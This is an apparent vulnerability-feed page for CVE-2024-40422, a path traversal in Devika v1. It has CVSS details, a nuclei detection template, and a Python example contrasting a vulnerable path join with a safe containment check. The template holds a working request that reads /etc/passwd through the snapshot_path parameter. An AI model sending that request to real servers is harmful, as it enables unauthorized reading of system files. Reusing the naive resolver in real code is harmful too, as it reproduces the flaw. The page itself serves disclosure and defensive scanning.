
Devika v1 - Path Traversal

2024-08-05 17:49:38
ProjectDiscovery
github.com
Tags: devika, path traversal, vulnerability, unauthorized access, critical, cve2024

CVSS3: 9.1
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score: 7
Confidence: Low

The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
id: CVE-2024-40422

info:
  name: Devika v1 - Path Traversal
  author: securityforeveryone,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
    - https://cvefeed.io/vuln/detail/CVE-2024-40422
    - https://github.com/alpernae/CVE-2024-40422
    - https://github.com/stitionai/devika
    - https://www.exploit-db.com/exploits/52066
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-40422
    cwe-id: CWE-22
    epss-score: 0.0087
    epss-percentile: 0.82513
    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: stitionai
    product: devika
    fofa-query: icon_hash="-1429839495"
  tags: cve,cve2024,devika,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/data HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: header
        words:
          - 'application/octet-stream'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ecbd6f0f8bc5ab7f040249fb93a67414c053613bd77c2fa53cd7951ca4a38947022100b0cd1ed056a2ee85ce893c451bf0cc564c2aae3254c2ef2a08c5bdf5d2386392:922c64590222798bb761d5b6d8e72950
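
A containment check of the kind that mitigates the CWE-22 flaw described above, shown beside the weak join-only pattern. This is an added example, not part of the nuclei template or of Devika's code; the page does not show the server-side handler, so the function names and the directory layout are assumptions.

```python
import os
import tempfile
from pathlib import Path


class PathEscapeError(ValueError):
    """The requested path resolves outside the allowed directory."""


def naive_resolve(base_dir, snapshot_path):
    # Weak pattern (hypothetical handler): join and normalise, but never
    # check containment. "../" segments and absolute paths leave base_dir.
    return os.path.normpath(os.path.join(base_dir, snapshot_path))


def safe_resolve(base_dir, snapshot_path):
    """Return the real path of snapshot_path only if it is a file under base_dir."""
    if "\x00" in snapshot_path:
        raise PathEscapeError("NUL byte in path")
    base = Path(base_dir).resolve()
    # resolve() collapses ".." and follows symlinks, so the check below is
    # made on the location that would actually be opened.
    candidate = (base / snapshot_path).resolve()
    # Compare path components, not string prefixes: a prefix test would
    # accept a sibling directory such as "<base>_old/x.png".
    if base not in candidate.parents:
        raise PathEscapeError(f"{snapshot_path!r} is outside {base}")
    if not candidate.is_file():
        raise FileNotFoundError(snapshot_path)
    return candidate


if __name__ == "__main__":
    # Constructed directory tree for the demonstration.
    root = Path(tempfile.mkdtemp()).resolve()
    base = root / "screenshots"
    base.mkdir()
    (base / "shot.png").write_bytes(b"png")
    (root / "secret.txt").write_text("outside")
    for requested in ["shot.png", "../secret.txt", str(root / "secret.txt")]:
        print("naive:", naive_resolve(base, requested))
        try:
            print("safe: ", safe_resolve(base, requested))
        except PathEscapeError as exc:
            print("safe:  rejected,", exc)
```

The check is only as strong as the point where it runs: the handler must open the path that `safe_resolve` returns, not the original parameter.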
